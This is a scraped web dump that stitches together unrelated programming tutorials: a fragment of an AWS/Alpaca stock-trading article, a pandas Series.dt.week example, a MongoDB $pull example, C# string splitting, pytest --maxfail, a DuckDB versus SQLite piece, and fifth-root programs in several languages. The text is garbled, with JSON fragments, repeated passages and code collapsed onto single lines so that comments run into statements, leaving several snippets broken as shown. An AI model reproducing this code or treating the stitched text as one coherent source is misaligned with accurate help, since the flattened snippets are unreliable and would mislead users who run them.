"text": "From AWS API gateway services, create a Rest API. Then give a name and create the API." }, { "code": null, "e": 10721, "s": 10593, "text": "Create a post and deploy from the Actions dropdown. Once you create it, the API is ready. You can use it in any UI if required." }, { "code": null, "e": 10943, "s": 10721, "text": "Finally, we have our Rest endpoint, where we can create post requests. The endpoint can be tested with Postman or any other tool. If you don’t need an endpoint, you can schedule the lambda function by following this link." }, { "code": null, "e": 11098, "s": 10943, "text": "Cheers! You can see that the stock is bought and sold in the Alpaca portal. Predictions are predicted from our model, and live data is fed into the model." }, { "code": null, "e": 11243, "s": 11098, "text": "We have trained a deep learning model and traded stocks using the output of the model in real-time. I still think there is room for improvement." }, { "code": null, "e": 11748, "s": 11243, "text": "I have used a deep neural network model here. You don’t need any model here. You can simply use your logic and create the pipeline.Better feature engineering and selection of those features can be performed.Different model architectures(like LSTM or DRL) need to be tested for time-series datasets.Backtesting needs to be performed on the training data. I have not covered backtesting in this article.The model can be retrained at frequent intervals. AWS Sagemaker provides an option without much hassle." }, { "code": null, "e": 11880, "s": 11748, "text": "I have used a deep neural network model here. You don’t need any model here. You can simply use your logic and create the pipeline." }, { "code": null, "e": 11957, "s": 11880, "text": "Better feature engineering and selection of those features can be performed." }, { "code": null, "e": 12049, "s": 11957, "text": "Different model architectures(like LSTM or DRL) need to be tested for time-series datasets." }, { "code": null, "e": 12153, "s": 12049, "text": "Backtesting needs to be performed on the training data. I have not covered backtesting in this article." }, { "code": null, "e": 12257, "s": 12153, "text": "The model can be retrained at frequent intervals. AWS Sagemaker provides an option without much hassle." }, { "code": null, "e": 12455, "s": 12257, "text": "If there is enough interest in the article, I will write a followup article on adding sentiment analysis about that particular stock in real-time with backtesting and add other model architectures." }, { "code": null, "e": 12755, "s": 12455, "text": "Note from Towards Data Science’s editors: While we allow independent authors to publish articles in accordance with our rules and guidelines, we do not endorse each author’s contribution. You should not rely on an author’s works without seeking professional advice. See our Reader Terms for details." }, { "code": null, "e": 12947, "s": 12755, "text": "This article is entirely informative. None of the content presented in this notebook constitutes a recommendation of any particular security. All trading strategies are used at your own risk." }, { "code": null, "e": 13026, "s": 12947, "text": "Questions? Comments? Feel free to leave your feedback in the comments section." }, { "code": null, "e": 13051, "s": 13026, "text": "Check out other articles" }, { "code": null, "e": 13165, "s": 13051, "text": "24x7 Live crypto trading | Buy Doge or any crypto using sentimentMake money using NFT + AI | GAN image generation" }, { "code": null, "e": 13231, "s": 13165, "text": "24x7 Live crypto trading | Buy Doge or any crypto using sentiment" }, { "code": null, "e": 13280, "s": 13231, "text": "Make money using NFT + AI | GAN image generation" }, { "code": null, "e": 13378, "s": 13280, "text": "Please subscribe to my newsletter to get the free working code for my articles and other updates." } ]
Python | Pandas Series.dt.week - GeeksforGeeks
20 Mar, 2019 Series.dt can be used to access the values of the series as datetimelike and return several properties. Pandas Series.dt.week attribute return a numpy array containing the week ordinal of the year in the underlying data of the given series object. Syntax: Series.dt.week Parameter : None Returns : numpy array Example #1: Use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object. # importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(['2012-10-21 09:30', '2019-7-18 12:30', '2008-02-2 10:30', '2010-4-22 09:25', '2019-11-8 02:22']) # Creating the indexidx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5'] # set the indexsr.index = idx # Convert the underlying data to datetime sr = pd.to_datetime(sr) # Print the seriesprint(sr) Output : Now we will use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object. # return the week ordinal# of the yearresult = sr.dt.week # print the resultprint(result) Output : As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given series object. Example #2 : Use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object. # importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(pd.date_range('2012-12-12 12:12', periods = 5, freq = 'M')) # Creating the indexidx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5'] # set the indexsr.index = idx # Print the seriesprint(sr) Output : Now we will use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object. # return the week ordinal# of the yearresult = sr.dt.week # print the resultprint(result) Output :As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given series object. Python pandas-series-datetime Python-pandas Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Python Dictionary How to Install PIP on Windows ? Read a file line by line in Python Enumerate() in Python Iterate over a list in Python Different ways to create Pandas Dataframe Python program to convert a list to string Create a Pandas DataFrame from Lists Python String | replace() Reading and Writing to text files in Python
[ { "code": null, "e": 24844, "s": 24816, "text": "\n20 Mar, 2019" }, { "code": null, "e": 25092, "s": 24844, "text": "Series.dt can be used to access the values of the series as datetimelike and return several properties. Pandas Series.dt.week attribute return a numpy array containing the week ordinal of the year in the underlying data of the given series object." }, { "code": null, "e": 25115, "s": 25092, "text": "Syntax: Series.dt.week" }, { "code": null, "e": 25132, "s": 25115, "text": "Parameter : None" }, { "code": null, "e": 25154, "s": 25132, "text": "Returns : numpy array" }, { "code": null, "e": 25285, "s": 25154, "text": "Example #1: Use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(['2012-10-21 09:30', '2019-7-18 12:30', '2008-02-2 10:30', '2010-4-22 09:25', '2019-11-8 02:22']) # Creating the indexidx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5'] # set the indexsr.index = idx # Convert the underlying data to datetime sr = pd.to_datetime(sr) # Print the seriesprint(sr)", "e": 25678, "s": 25285, "text": null }, { "code": null, "e": 25687, "s": 25678, "text": "Output :" }, { "code": null, "e": 25818, "s": 25687, "text": "Now we will use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# return the week ordinal# of the yearresult = sr.dt.week # print the resultprint(result)", "e": 25909, "s": 25818, "text": null }, { "code": null, "e": 25918, "s": 25909, "text": "Output :" }, { "code": null, "e": 26227, "s": 25918, "text": "As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given series object. Example #2 : Use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(pd.date_range('2012-12-12 12:12', periods = 5, freq = 'M')) # Creating the indexidx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5'] # set the indexsr.index = idx # Print the seriesprint(sr)", "e": 26501, "s": 26227, "text": null }, { "code": null, "e": 26510, "s": 26501, "text": "Output :" }, { "code": null, "e": 26641, "s": 26510, "text": "Now we will use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# return the week ordinal# of the yearresult = sr.dt.week # print the resultprint(result)", "e": 26732, "s": 26641, "text": null }, { "code": null, "e": 26917, "s": 26732, "text": "Output :As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given series object." }, { "code": null, "e": 26947, "s": 26917, "text": "Python pandas-series-datetime" }, { "code": null, "e": 26961, "s": 26947, "text": "Python-pandas" }, { "code": null, "e": 26968, "s": 26961, "text": "Python" }, { "code": null, "e": 27066, "s": 26968, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27075, "s": 27066, "text": "Comments" }, { "code": null, "e": 27088, "s": 27075, "text": "Old Comments" }, { "code": null, "e": 27106, "s": 27088, "text": "Python Dictionary" }, { "code": null, "e": 27138, "s": 27106, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 27173, "s": 27138, "text": "Read a file line by line in Python" }, { "code": null, "e": 27195, "s": 27173, "text": "Enumerate() in Python" }, { "code": null, "e": 27225, "s": 27195, "text": "Iterate over a list in Python" }, { "code": null, "e": 27267, "s": 27225, "text": "Different ways to create Pandas Dataframe" }, { "code": null, "e": 27310, "s": 27267, "text": "Python program to convert a list to string" }, { "code": null, "e": 27347, "s": 27310, "text": "Create a Pandas DataFrame from Lists" }, { "code": null, "e": 27373, "s": 27347, "text": "Python String | replace()" } ]
How to remove element in a MongoDB array?
To remove an element, update, and use $pull in MongoDB. The $pull operator removes from an existing array all instances of a value or values that match a specified condition. Let us first create a collection with documents − db.demo541.insertOne({"software":{"services":["gmail","facebook","yahoo"]}});{ "acknowledged" : true, "insertedId" : ObjectId("5e8ca845ef4dcbee04fbbc11") } > db.demo541.insertOne({"software":{"services":["whatsapp","twitter"]}});{ "acknowledged" : true, "insertedId" : ObjectId("5e8ca85cef4dcbee04fbbc12") } Display all documents from a collection with the help of find() method − > db.demo541.find(); This will produce the following output − { "_id" : ObjectId("5e8ca845ef4dcbee04fbbc11"), "software" : { "services" : [ "gmail", "facebook", "yahoo" ] } } { "_id" : ObjectId("5e8ca85cef4dcbee04fbbc12"), "software" : { "services" : [ "whatsapp", "twitter" ] } } Following is the query to remove an element in a MongoDB array − > db.demo541.update({ _id: ObjectId("5e8ca845ef4dcbee04fbbc11") }, ... { $pull: { 'software.services': "yahoo" }} ... ); WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 }) Display all documents from a collection with the help of find() method − > db.demo541.find(); This will produce the following output − { "_id" : ObjectId("5e8ca845ef4dcbee04fbbc11"), "software" : { "services" : [ "gmail", "facebook" ] } } { "_id" : ObjectId("5e8ca85cef4dcbee04fbbc12"), "software" : { "services" : [ "whatsapp", "twitter" ] } }
[ { "code": null, "e": 1237, "s": 1062, "text": "To remove an element, update, and use $pull in MongoDB. The $pull operator removes from an existing array all instances of a value or values that match a specified condition." }, { "code": null, "e": 1287, "s": 1237, "text": "Let us first create a collection with documents −" }, { "code": null, "e": 1607, "s": 1287, "text": "db.demo541.insertOne({\"software\":{\"services\":[\"gmail\",\"facebook\",\"yahoo\"]}});{\n \"acknowledged\" : true,\n \"insertedId\" : ObjectId(\"5e8ca845ef4dcbee04fbbc11\")\n}\n> db.demo541.insertOne({\"software\":{\"services\":[\"whatsapp\",\"twitter\"]}});{\n \"acknowledged\" : true,\n \"insertedId\" : ObjectId(\"5e8ca85cef4dcbee04fbbc12\")\n}" }, { "code": null, "e": 1680, "s": 1607, "text": "Display all documents from a collection with the help of find() method −" }, { "code": null, "e": 1701, "s": 1680, "text": "> db.demo541.find();" }, { "code": null, "e": 1742, "s": 1701, "text": "This will produce the following output −" }, { "code": null, "e": 1962, "s": 1742, "text": "{ \"_id\" : ObjectId(\"5e8ca845ef4dcbee04fbbc11\"), \"software\" : { \"services\" : [ \"gmail\", \"facebook\", \"yahoo\" ] } }\n{ \"_id\" : ObjectId(\"5e8ca85cef4dcbee04fbbc12\"), \"software\" : { \"services\" : [ \"whatsapp\", \"twitter\" ] } } " }, { "code": null, "e": 2027, "s": 1962, "text": "Following is the query to remove an element in a MongoDB array −" }, { "code": null, "e": 2217, "s": 2027, "text": "> db.demo541.update({ _id: ObjectId(\"5e8ca845ef4dcbee04fbbc11\") },\n... { $pull: { 'software.services': \"yahoo\" }}\n... );\nWriteResult({ \"nMatched\" : 1, \"nUpserted\" : 0, \"nModified\" : 1 })" }, { "code": null, "e": 2290, "s": 2217, "text": "Display all documents from a collection with the help of find() method −" }, { "code": null, "e": 2311, "s": 2290, "text": "> db.demo541.find();" }, { "code": null, "e": 2352, "s": 2311, "text": "This will produce the following output −" }, { "code": null, "e": 2562, "s": 2352, "text": "{ \"_id\" : ObjectId(\"5e8ca845ef4dcbee04fbbc11\"), \"software\" : { \"services\" : [ \"gmail\", \"facebook\" ] } }\n{ \"_id\" : ObjectId(\"5e8ca85cef4dcbee04fbbc12\"), \"software\" : { \"services\" : [ \"whatsapp\", \"twitter\" ] } }" } ]
C# program to split and join a string
To split and join a string in C#, use the split() and join() method. Let us say the following is our string − string str = "This is our Demo String"; To split the string, we will use the split() method − var arr = str.Split(' '); Now to join, use the join() method and join rest of the string. Here, we have skipped the part of the string using the skip() method − string rest = string.Join(" ", arr.Skip(1)); You can try to run the following code in C# to split and join a string. Live Demo using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Demo { class MyApplication { static void Main(string[] args) { string str = "This is our Demo String"; var arr = str.Split(' '); // skips the first element and joins rest of the array string rest = string.Join(" ", arr.Skip(1)); Console.WriteLine(rest); } } } is our Demo String
[ { "code": null, "e": 1172, "s": 1062, "text": "To split and join a string in C#, use the split() and join() method. Let us say the following is our string −" }, { "code": null, "e": 1212, "s": 1172, "text": "string str = \"This is our Demo String\";" }, { "code": null, "e": 1266, "s": 1212, "text": "To split the string, we will use the split() method −" }, { "code": null, "e": 1292, "s": 1266, "text": "var arr = str.Split(' ');" }, { "code": null, "e": 1427, "s": 1292, "text": "Now to join, use the join() method and join rest of the string. Here, we have skipped the part of the string using the skip() method −" }, { "code": null, "e": 1472, "s": 1427, "text": "string rest = string.Join(\" \", arr.Skip(1));" }, { "code": null, "e": 1544, "s": 1472, "text": "You can try to run the following code in C# to split and join a string." }, { "code": null, "e": 1554, "s": 1544, "text": "Live Demo" }, { "code": null, "e": 1973, "s": 1554, "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nnamespace Demo {\n class MyApplication {\n static void Main(string[] args) {\n string str = \"This is our Demo String\";\n var arr = str.Split(' ');\n // skips the first element and joins rest of the array\n string rest = string.Join(\" \", arr.Skip(1));\n Console.WriteLine(rest);\n }\n }\n}" }, { "code": null, "e": 1992, "s": 1973, "text": "is our Demo String" } ]
Pytest - Stop Test Suite after N Test Failures
In a real scenario, once a new version of the code is ready to deploy, it is first deployed into pre-prod/ staging environment. Then a test suite runs on it. The code is qualified for deploying to production only if the test suite passes. If there is test failure, whether it is one or many, the code is not production ready. Therefore, what if we want to stop the execution of test suite soon after n number of test fails. This can be done in pytest using maxfail. The syntax to stop the execution of test suite soon after n number of test fails is as follows − pytest --maxfail = <num> Create a file test_failure.py with the following code. import pytest import math def test_sqrt_failure(): num = 25 assert math.sqrt(num) == 6 def test_square_failure(): num = 7 assert 7*7 == 40 def test_equality_failure(): assert 10 == 11 All the 3 tests will fail on executing this test file. Here, we are going to stop the execution of the test after one failure itself by − pytest test_failure.py -v --maxfail 1 test_failure.py::test_sqrt_failure FAILED =================================== FAILURES =================================== _______________________________________ test_sqrt_failure __________________________________________ def test_sqrt_failure(): num = 25 > assert math.sqrt(num) == 6 E assert 5.0 == 6 E + where 5.0 = <built-in function sqrt>(25) E + where <built-in function sqrt>= math.sqrt test_failure.py:6: AssertionError =============================== 1 failed in 0.04 seconds =============================== In the above result, we can see the execution is stopped on one failure. 21 Lectures 4 hours Lucian Musat 22 Lectures 1.5 hours Fanuel Mapuwei 44 Lectures 3.5 hours Rohit Dharaviya Print Add Notes Bookmark this page
[ { "code": null, "e": 2200, "s": 2042, "text": "In a real scenario, once a new version of the code is ready to deploy, it is first deployed into pre-prod/ staging environment. Then a test suite runs on it." }, { "code": null, "e": 2368, "s": 2200, "text": "The code is qualified for deploying to production only if the test suite passes. If there is test failure, whether it is one or many, the code is not production ready." }, { "code": null, "e": 2508, "s": 2368, "text": "Therefore, what if we want to stop the execution of test suite soon after n number of test fails. This can be done in pytest using maxfail." }, { "code": null, "e": 2605, "s": 2508, "text": "The syntax to stop the execution of test suite soon after n number of test fails is as follows −" }, { "code": null, "e": 2631, "s": 2605, "text": "pytest --maxfail = <num>\n" }, { "code": null, "e": 2686, "s": 2631, "text": "Create a file test_failure.py with the following code." }, { "code": null, "e": 2888, "s": 2686, "text": "import pytest\nimport math\n\ndef test_sqrt_failure():\n num = 25\n assert math.sqrt(num) == 6\n\ndef test_square_failure():\n num = 7\n assert 7*7 == 40\n\ndef test_equality_failure():\n assert 10 == 11" }, { "code": null, "e": 3026, "s": 2888, "text": "All the 3 tests will fail on executing this test file. Here, we are going to stop the execution\nof the test after one failure itself by −" }, { "code": null, "e": 3065, "s": 3026, "text": "pytest test_failure.py -v --maxfail 1\n" }, { "code": null, "e": 3595, "s": 3065, "text": "test_failure.py::test_sqrt_failure FAILED\n=================================== FAILURES\n=================================== _______________________________________\ntest_sqrt_failure __________________________________________\n def test_sqrt_failure():\n num = 25\n> assert math.sqrt(num) == 6\nE assert 5.0 == 6\nE + where 5.0 = <built-in function sqrt>(25)\nE + where <built-in function sqrt>= math.sqrt\ntest_failure.py:6: AssertionError\n=============================== 1 failed in 0.04 seconds\n===============================\n" }, { "code": null, "e": 3668, "s": 3595, "text": "In the above result, we can see the execution is stopped on one failure." }, { "code": null, "e": 3701, "s": 3668, "text": "\n 21 Lectures \n 4 hours \n" }, { "code": null, "e": 3715, "s": 3701, "text": " Lucian Musat" }, { "code": null, "e": 3750, "s": 3715, "text": "\n 22 Lectures \n 1.5 hours \n" }, { "code": null, "e": 3766, "s": 3750, "text": " Fanuel Mapuwei" }, { "code": null, "e": 3801, "s": 3766, "text": "\n 44 Lectures \n 3.5 hours \n" }, { "code": null, "e": 3818, "s": 3801, "text": " Rohit Dharaviya" }, { "code": null, "e": 3825, "s": 3818, "text": " Print" }, { "code": null, "e": 3836, "s": 3825, "text": " Add Notes" } ]
DuckDB — SQLite for Data Analysis | by Alan Jones | Towards Data Science
When I wrote Python Pandas and SQLite, for Towards Data Science, I was unaware of another embedded database sytem called DuckDB. I received a tweet about it a day or so after publication so thought I should take a look at it. DuckDB is not buit in to Python like SQLite but after a simple install, you’d hardly know the difference. Except that there is a difference. The DuckDB developers claim that their database system is up to 10 times faster than SQLite for analytics applications. There are of course technical reasons in the design of the database for this but the main reason is that there are relational databases for two types of application: Online Transactional Processing(OLTP) and Online Analytical Processing (OLAP). OLTP applications are typically business processes that modify database tables in response to external requests. A banking system is an example: people are taking money out, putting it in and their balances are shifting up and down all the time meaning that the data in the database in constantly changing in response to the transaction that are occuring. A database tracking sales and stock levels might have a similar types of data updates going on as items are sold to customers or received from suppliers. Essentially, OLTP systems spend most of their time, inserting, deleting and updating rows in database tables. OLAP sytems are less dynamic. They are more like data warehouses. Data is stored but doesn’t change that often. The main types of operation will be selecting, reading, comparing and analysing data. An online retailer might analyse customer purchasing data, compare it to other customers and try and analyse similarities. By doing this they can attempt to predict an individual’s preferences so that visitors to their web site can get a personalized experience. OLAP systems tend to spend most of their time dealing with columns of data, summing, finding means and that sort of thing. Although database systems all have the same basic functionality, those designed for OLTP are less good at OLAP applications and vice versa due to the way data is stored — in a way that easier to access columns or one that easier to access rows. So SQLite is good for OLTP and DuckDB is better for OLAP. You can try it out with my original article by doing a pip install: pip install duckdb and changing the first line of the code from import sqlite3 as sql to import duckdb as sql The rest of the code should work as before. Don’t expect to see much difference in the operation of the simple code that I presented in that article but if you need to do any heavy duty data analytics then you might find that DuckDB is a better bet. I’ll be writing more about this topic in the future but, for now, thanks for reading and happy data analysis. Disclosure: I have no connection with DuckDB or its developers And if you would like to be informed about future articles please subscribe to my free newsletter.
[ { "code": null, "e": 398, "s": 172, "text": "When I wrote Python Pandas and SQLite, for Towards Data Science, I was unaware of another embedded database sytem called DuckDB. I received a tweet about it a day or so after publication so thought I should take a look at it." }, { "code": null, "e": 504, "s": 398, "text": "DuckDB is not buit in to Python like SQLite but after a simple install, you’d hardly know the difference." }, { "code": null, "e": 904, "s": 504, "text": "Except that there is a difference. The DuckDB developers claim that their database system is up to 10 times faster than SQLite for analytics applications. There are of course technical reasons in the design of the database for this but the main reason is that there are relational databases for two types of application: Online Transactional Processing(OLTP) and Online Analytical Processing (OLAP)." }, { "code": null, "e": 1414, "s": 904, "text": "OLTP applications are typically business processes that modify database tables in response to external requests. A banking system is an example: people are taking money out, putting it in and their balances are shifting up and down all the time meaning that the data in the database in constantly changing in response to the transaction that are occuring. A database tracking sales and stock levels might have a similar types of data updates going on as items are sold to customers or received from suppliers." }, { "code": null, "e": 1524, "s": 1414, "text": "Essentially, OLTP systems spend most of their time, inserting, deleting and updating rows in database tables." }, { "code": null, "e": 1985, "s": 1524, "text": "OLAP sytems are less dynamic. They are more like data warehouses. Data is stored but doesn’t change that often. The main types of operation will be selecting, reading, comparing and analysing data. An online retailer might analyse customer purchasing data, compare it to other customers and try and analyse similarities. By doing this they can attempt to predict an individual’s preferences so that visitors to their web site can get a personalized experience." }, { "code": null, "e": 2108, "s": 1985, "text": "OLAP systems tend to spend most of their time dealing with columns of data, summing, finding means and that sort of thing." }, { "code": null, "e": 2353, "s": 2108, "text": "Although database systems all have the same basic functionality, those designed for OLTP are less good at OLAP applications and vice versa due to the way data is stored — in a way that easier to access columns or one that easier to access rows." }, { "code": null, "e": 2411, "s": 2353, "text": "So SQLite is good for OLTP and DuckDB is better for OLAP." }, { "code": null, "e": 2479, "s": 2411, "text": "You can try it out with my original article by doing a pip install:" }, { "code": null, "e": 2498, "s": 2479, "text": "pip install duckdb" }, { "code": null, "e": 2543, "s": 2498, "text": "and changing the first line of the code from" }, { "code": null, "e": 2565, "s": 2543, "text": "import sqlite3 as sql" }, { "code": null, "e": 2568, "s": 2565, "text": "to" }, { "code": null, "e": 2589, "s": 2568, "text": "import duckdb as sql" }, { "code": null, "e": 2633, "s": 2589, "text": "The rest of the code should work as before." }, { "code": null, "e": 2839, "s": 2633, "text": "Don’t expect to see much difference in the operation of the simple code that I presented in that article but if you need to do any heavy duty data analytics then you might find that DuckDB is a better bet." }, { "code": null, "e": 2949, "s": 2839, "text": "I’ll be writing more about this topic in the future but, for now, thanks for reading and happy data analysis." }, { "code": null, "e": 3012, "s": 2949, "text": "Disclosure: I have no connection with DuckDB or its developers" } ]
Fifth root of a number - GeeksforGeeks
19 Oct, 2021 Given a number, print floor of 5’th root of the number.Examples: Input : n = 32 Output : 2 2 raise to power 5 is 32 Input : n = 250 Output : 3 Fifth square root of 250 is between 3 and 4 So floor value is 3. Method 1 (Simple) A simple solution is initialize result as 0, keep incrementing result while result5 is smaller than or equal to n. Finally return result – 1. C++14 Java Python3 C# PHP Javascript // A C++ program to find floor of 5th root#include<bits/stdc++.h>using namespace std; // Returns floor of 5th root of nint floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 is // smaller than or equal to n while (res*res*res*res*res <= n) res++; // Return floor of 5'th root return res-1;} // Driver programint main(){ int n = 250; cout << "Floor of 5'th root is " << floorRoot5(n); return 0;} // Java program to find floor of 5th root class GFG { // Returns floor of 5th root of nstatic int floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code public static void main(String []args) { int n = 250; System.out.println("Floor of 5'th root is " + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal. # A Python3 program to find the floor# of the 5th root # Returns floor of 5th root of ndef floorRoot5(n): # Base cases if n == 0 and n == 1: return n # Initialize result res = 0 # Keep incrementing res while res^5 # is smaller than or equal to n while res * res * res * res * res <= n: res += 1 # Return floor of 5'th root return res-1 # Driver Codeif __name__ == "__main__": n = 250 print("Floor of 5'th root is", floorRoot5(n)) # This code is contributed by Rituraj Jain // C# program to find floor of 5th rootusing System; class GFG { // Returns floor of 5th root of nstatic int floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result int res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code public static void Main() { int n = 250; Console.Write("Floor of 5'th root is " + floorRoot5(n)); }} // This code is contributed by Sumit Sudhakar. <?php// PHP program to find// floor of 5th root // Returns floor of// 5th root of nfunction floorRoot5($n){ // Base cases if ($n == 0 || $n == 1) return $n; // Initialize result $res = 0; // Keep incrementing res while // res^5 is smaller than or // equal to n while ($res * $res * $res * $res * $res <= $n) $res++; // Return floor // of 5'th root return $res - 1;} // Driver Code $n = 250; echo "Floor of 5'th root is " , floorRoot5($n); // This code is contributed by nitin mittal.?> <script> // JavaScript program to find floor of 5th root // Returns floor of 5th root of nfunction floorRoot5(n){ // Base cases if (n == 0 || n == 1) return n; // Initialize result let res = 0; // Keep incrementing res while res^5 // is smaller than or equal to n while (res * res * res * res * res <= n) res++; // Return floor of 5'th root return res-1;} // Driver Code let n = 250; document.write("Floor of 5'th root is " + floorRoot5(n)); </script> Output: Floor of 5'th root is 3 Time complexity of above solution is O(n1/5). We can do better. See below solution. Method 2 (Binary Search) The idea is to do Binary Search. We start from n/2 and if its 5’th power is more than n, we recur for interval from n/2+1 to n. Else if power is less, we recur for interval 0 to n/2-1 C++ Java Python3 C# PHP Javascript // A C++ program to find floor of 5'th root#include<bits/stdc++.h>using namespace std; // Returns floor of 5'th root of nint floorRoot5(int n){ // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point and its power 5 int mid = (low + high) / 2; long int mid5 = mid*mid*mid*mid*mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, we update answer when // mid5 is smaller than n, and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } else // If mid^5 is greater than n high = mid - 1; } return ans;} // Driver programint main(){ int n = 250; cout << "Floor of 5'th root is " << floorRoot5(n); return 0;} // A Java program to find// floor of 5'th root class GFG { // Returns floor of 5'th // root of n static int floorRoot5(int n) { // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 int mid = (low + high) / 2; long mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans; } // Driver Code public static void main(String []args) { int n = 250; System.out.println("Floor of 5'th root is " + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal. # A Python3 program to find the floor# of 5'th root # Returns floor of 5'th root of ndef floorRoot5(n): # Base cases if n == 0 or n == 1: return n # Do Binary Search for floor of # 5th square root low, high, ans = 1, n, 0 while low <= high: # Find the middle point and its power 5 mid = (low + high) // 2 mid5 = mid * mid * mid * mid * mid # If mid is the required root if mid5 == n: return mid # Since we need floor, we update answer # when mid5 is smaller than n, and move # closer to 5'th root if mid5 < n: low = mid + 1 ans = mid else: # If mid^5 is greater than n high = mid - 1 return ans # Driver Codeif __name__ == "__main__": n = 250 print("Floor of 5'th root is", floorRoot5(n)) # This code is contributed by Rituraj Jain // A C# program to find// floor of 5'th rootusing System; class GFG { // Returns floor of 5'th // root of n static int floorRoot5(int n) { // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root int low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 int mid = (low + high) / 2; long mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans; } // Driver Code public static void Main(String []args) { int n = 250; Console.WriteLine("Floor of 5'th root is " + floorRoot5(n)); }} // This code is contributed by Anshul Aggarwal. <?php// A PHP program to find floor of 5'th root // Returns floor of 5'th root of nfunction floorRoot5($n){ // Base cases if ($n == 0 || $n == 1) return $n; // Do Binary Search for floor of 5th square root $low = 1; $high = $n; $ans = 0; while ($low <= $high) { // Find the middle point and its power 5 $mid = (int)(($low + $high) / 2); $mid5 = $mid*$mid*$mid*$mid*$mid; // If mid is the required root if ($mid5 == $n) return $mid; // Since we need floor, we update answer when // mid5 is smaller than n, and move closer to // 5'th root if ($mid5 < $n) { $low = $mid + 1; $ans = $mid; } else // If mid^5 is greater than n $high = $mid - 1; } return $ans;} // Driver code $n = 250; echo "Floor of 5'th root is ".floorRoot5($n); // This code is contributed by mits?> <script> // A javascript program to find// floor of 5'th root // Returns floor of 5'th// root of nfunction floorRoot5(n){ // Base cases if (n == 0 || n == 1) return n; // Do Binary Search for // floor of 5th square root var low = 1, high = n, ans = 0; while (low <= high) { // Find the middle point // and its power 5 var mid = parseInt((low + high) / 2); var mid5 = mid * mid * mid * mid * mid; // If mid is the required root if (mid5 == n) return mid; // Since we need floor, // we update answer when // mid5 is smaller than n, // and move closer to // 5'th root if (mid5 < n) { low = mid + 1; ans = mid; } // If mid^5 is greater // than n else high = mid - 1; } return ans;} // Driver Codevar n = 250;document.write("Floor of 5'th root is " + floorRoot5(n)); // This code contributed by Princi Singh </script> Output: Floor of 5'th root is 3 Time Complexity: O(logN)Auxiliary Space: O(1) We can also use Newton Raphson Method to find exact root. See this for implementation.Source : http://qa.geeksforgeeks.org/7487/program-calculate-fifth-without-using-mathematical-operatorsPlease write comments if you find anything incorrect, or you want to share more information about the topic discussed above Sam007 Anshul_Aggarwal nitin mittal rituraj_jain Mithun Kumar chinmoy1997pal princi singh pankajsharmagfg ashutoshsinghgeeksforgeeks Algorithms Algorithms Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments DSA Sheet by Love Babbar Difference between Informed and Uninformed Search in AI SCAN (Elevator) Disk Scheduling Algorithms Quadratic Probing in Hashing K means Clustering - Introduction What are Hash Functions and How to choose a good Hash Function? Difference between Algorithm, Pseudocode and Program FCFS Disk Scheduling Algorithms Program for SSTF disk scheduling algorithm
